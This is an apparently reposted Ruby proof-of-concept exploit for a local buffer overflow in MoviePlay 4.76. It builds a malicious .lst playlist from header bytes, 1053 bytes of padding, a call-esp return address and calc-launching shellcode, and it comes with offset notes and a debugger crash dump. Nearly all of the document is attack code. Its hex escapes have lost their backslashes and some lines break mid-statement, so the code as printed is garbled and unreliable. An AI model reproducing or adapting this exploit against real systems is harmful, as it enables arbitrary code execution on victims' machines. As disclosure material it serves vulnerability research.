Rated as : Moderate Risk
#!/usr/bin/env ruby
###################
#MoviePlay 4.76 .lst file Local buffer over-flow.
#Credit to n00b for writing poc code..Pmsl
#Tested on :Win xp sp2 eng.
#Vendor web site: Netfarer.com MoviePlay 4.76
#Buffer-over flow reported : Jan 02 2007 12:00AM
#Credit goes to Parvez Anwar for finding the bug.
#################################################################################
#MoviePlay is prone to a remote buffer-overflow vulnerability because it
#fails to properly bounds-check user-supplied input before copying it to
#an insufficiently sized memory buffer. Exploiting this vulnerability
#allows attackers to execute arbitrary machine code in the context of
#the affected application..
#I looked all over for a poc code or even some
#thing to back the claim up nothing was found
#And as i was board so i decided to write a poc for this.
#1053byte's next 4 bytes over write eip then esp was pointing
#4 bytes after no need for any nop sled or any-thing...
#1053 bytes of buffer --> 4 bytes ret --> 351 shell-code --> 592
bytes of buffer.
#File is 2000 byte's.
#################################################################################
# ..\Debug info//..
#(664.3b0): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=ffffffff ebx=00000000 ecx=41414141 edx=0048ef90 esi=00b00048
edi=00000001
#eip=41414141 esp=0012ec78 ebp=41414141 iopl=0 nv up ei ng nz ac pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010296
#41414141 ?? ???
#################################################################################
#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre
#################################################################################
Header1 = "x5bx4dx6fx76x69x65x50x6cx61x79x5dx0dx0ax46x69x6c"+
"x65x4ex61x6dx65x30x3dx43x3ax5c"
bof1 = 'A'* 1053 #1053 bytes to our eip is over-writen
ret = "x45x15xF6x77" # call esp in Shlwapi.dll 0x77F61545..
#Calc shell-code.
shell =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+ #351 bytes
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"+
"x42x50x42x50x42x30x4bx58x45x54x4ex33x4bx38x4ex57"+
"x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx38"+
"x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx58"+
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c"+
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
"x46x4fx4bx53x46x55x46x32x46x30x45x47x45x4ex4bx48"+
"x4fx35x46x32x41x50x4bx4ex48x36x4bx58x4ex50x4bx54"+
"x4bx58x4fx35x4ex31x41x50x4bx4ex4bx38x4ex41x4bx38"+
"x41x30x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x53"+
"x42x4cx46x46x4bx48x42x44x42x43x45x38x42x4cx4ax37"+
"x4ex50x4bx48x42x44x4ex50x4bx48x42x57x4ex51x4dx4a"+
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx58x42x58x42x4b"+
"x42x30x42x50x42x30x4bx48x4ax46x4ex43x4fx55x41x43"+
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"+
"x42x55x4ax46x4fx4ex50x4cx42x4ex42x46x4ax36x4ax49"+
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x41x56"+
"x4ex46x43x56x50x42x45x56x4ax37x45x36x42x30x5a"
bof2 = 'B'* 592 #592 fil the rest of the file to make it to 2000 bytes.
Header2 = "x2ex6d"+
"x70x33x0dx0ax46x69x6cx65x4ex61x6dx65x31x3dx0dx0a"+
"x4ex75x6dx46x69x6cx65x73x3dx31x0dx0a"
lst_file = Header1 + bof1 + ret + shell + bof2 + Header2
File.open( "Exploit.lst","w") do |the_file| #Write
file
the_file.puts (lst_file)
the_file.close
print 'File was created success-fully..!!'
end
securitydot.net - 2007-06-09
|
